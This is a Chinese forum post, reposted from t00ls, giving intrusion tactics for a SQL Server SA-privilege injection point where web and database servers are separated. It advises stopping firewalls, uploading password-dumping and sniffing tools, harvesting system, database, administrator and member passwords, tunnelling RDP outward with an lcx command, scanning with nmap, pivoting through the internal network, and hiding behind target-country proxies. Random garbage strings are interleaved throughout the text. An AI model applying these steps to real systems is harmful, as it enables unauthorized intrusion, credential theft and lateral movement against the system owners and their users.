当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。+ M( T$ N+ ?) W. z4 r6 h' i* q- E
- C6 C5 j. P0 b5 J) e8 ]
: o! G+ f7 X7 ?0 c3 @7 r
u. n# @6 X! i8 b" g7 {# VSA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)' ]( g9 }. q$ q# o6 A
: G. D4 s( Z% v( I P* @- D( o4 j/ r# e; E2 D- H9 y
一、DB机有公网IP.0 G; Y, ^; {9 J+ g4 c4 B
f3 O5 a7 Y) P8 \% k! ^
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.- M' U6 K0 M- O7 p& ?
! W6 K/ L8 Q8 y! y0 c9 r
8 o7 w1 u7 P5 v* P2 @" l
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.% y1 s5 M, [5 C& Y m+ ?
% ]8 D V, Y( P% a4 V
8 Z* {. x% `2 G3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
5 H+ f5 A r! J! T9 X' R/ T; g. p. g9 b+ b$ u' C; g
' J7 p" j' n8 q, ]5 s- Z4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.
( E/ }+ y$ J" L7 B) K6 G7 X+ d7 ?/ A' S. J( i" \
- S2 ]5 d6 C. I* W4 X
9 p2 i% h" k7 y; _+ L% S4 e3 S( A9 N
二、DB机只有内网IP
' g, |2 ?; B2 G2 I9 n: S- l+ E- x$ x8 j$ N! [- o0 [: M9 l' R
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
0 }0 @1 V' _8 w( Z
( ?7 x% F; e T" Q: B) |" R3 ?9 Q$ Q, K6 R2 `6 a
2:停掉防火墙和IP策略再从内往外扫描.9 Y/ o6 k* W7 m/ \
, ]+ r: s9 J2 m, N! e
' O- j0 K5 e6 M2 u. G* s
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
, t- k* ^* Q |: B
% Z7 l# n1 j- m' m2 v( r& ^* l% h2 d M4 d& Y( z
4:学会密码规律分析往往会有惊喜.
) S @7 y+ U( e4 U, u( G! f% a: e. W% B
: c# `% z2 n1 d. Q& r/ z5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等$ m4 q& M4 s8 U
: n/ Q6 c: v+ O4 f* R2 b6 {
' t- A7 r# w/ o/ [1 q2 L
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对